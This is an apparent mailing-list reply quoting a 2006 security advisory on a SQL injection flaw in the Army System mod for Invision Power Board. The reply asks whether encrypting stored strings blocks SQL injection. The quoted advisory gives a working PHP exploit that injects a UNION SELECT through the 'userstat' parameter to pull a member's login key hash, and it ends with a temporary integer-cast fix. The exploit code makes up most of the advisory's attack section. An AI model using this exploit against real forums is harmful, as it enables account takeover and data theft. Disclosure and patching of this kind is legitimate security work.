<<< Date Index >>>     <<< Thread Index >>>

Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit



Hi,

   I have a question:
If you use an ecryption algorithm to store/get data into/from the database you will not be able to do SQL injections ? With a simple encryption algorithm, I do with php explode, transform the string into an array and run the algorithm on each member of the array. After this is done I convert from array to string and insert/select into/from the database. This way if I have let's say the string "Hello world" I will get the correct information if I try to run a select * from table where name like "Hello %" With this I think I will not be vulnerable to SQL injection and I will also have the information in the database secure.
   What do you think about this ?

Best regards,
Cristian Stoica

P.S.: I know it will take a bit longer, but I think it's ok.
unsecure@xxxxxxxxxxx wrote:
VULNERABLE PRODUCT
-----------------------------------
Invision Power Board Army System Mod
Version: 2.1 and priors.
Url: http://supersmashbrothers.2ya.com
Vulnerability: Remote SQL Injection
-----------------------------------------------------


BACKGROUND
----------------------------
Army System v2.1 is a very popular mods that has a ranking system built-in.
This multiple player rpg can easily be installed on every Invision Power Board 
v2.x.x
Source: "http://mods.invisionize.com/db/index.php/f/3347";
Google: "Army System 2.1 by supersmashbrothers"

********************************************************************
Requirements Minimum: Invision Board: 2.0.0 Final PHP: 4.1.0
Recommended Invision Board: 2.0.1 PHP: 4.3.0 or better SQL
Any sql will work fine as long as you have the driver.
Minimum MySQL: 3.23
Recommended MySQL: 3.23 or better
Recommended for Larger sites: No memory limit and no safe mode for faster 
loading
********************************************************************


VULNERABILITY
-------------------------------
Army System is prone to a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input passed to the "userstat" parameter is not correctly sanitised before being used in a SQL query. A specially crafted URL could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.


EXPLOIT
----------------

<?php
/* --------------------------- EXPLOIT ---------------------------
Invision Power Board Army System Mod 2.1 SQL Injection Exploit
Tested on: Latest version (2.1.0)
Discovered on: 06.02.2006 by Alex & fRoGGz
Credits to: SecuBox Labs

PLEASE READ THIS !
The query of the SQL Injection depends about the number of fields in the sql 
table
We have successfully tested the exploit on a new fresh IPB 2.1.x with Army System Mod 2.1 installed

IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

$target = "http://site.com/forums/";; // <--- Where ?
$prefix = "ibf_"; // <--- SQL prefix ?
$id = 1; // <--- Who ?

print_r(get_infos($target,$prefix,$id));
if(!get_infos($target,$prefix,$id)) echo "failed";

function get_infos($target,$prefix,$id) {

    $inject = 
"index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
    $inject.= 
"1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
    $inject.= 
"1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
    $inject.= 
"NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
    $inject.= "NULL+FROM+".$prefix."members+WHERE+id=";

    $filename = $target . $inject . $id;

    $handle = fopen ($filename, "r");
        $infos = array();

        if (feof($handle)) { continue 2; }
        if ( $handle ) {
                while ( ($buffer = fgets( $handle )) )
                {
                        if ( strpos( $buffer, "<td class='pformleft' 
width=\"35%\">Name</td>") ) {
                                $infos['md5'] = strip_tags ( fgets( $handle) );
                break;
                        }
                }
        }

    fclose ($handle);

        if (count($infos) == 1) return $infos;
        return false;
}
?>



VENDOR STATUS
---------------------------
There is no solution at the time.
Edit the source code manually to solve this problem & many others !


// You could temporary fix the problem:
// Find sources/action_public/army.php (line 486:$id2 = 
$this->ipsclass->input['ID'];
// After the line put:
$id2 = ereg_replace('([^0-9])','',$id2);
$id2 = (int)$id2;
-----------------------------------------------------------------------------


CREDiTS
------------------------------
SecuBox Labs - fRoGGz & Alex
Greet's fly out to: Mark aka MT
Visit: http://secubox.shadock.net
--------------------------------------------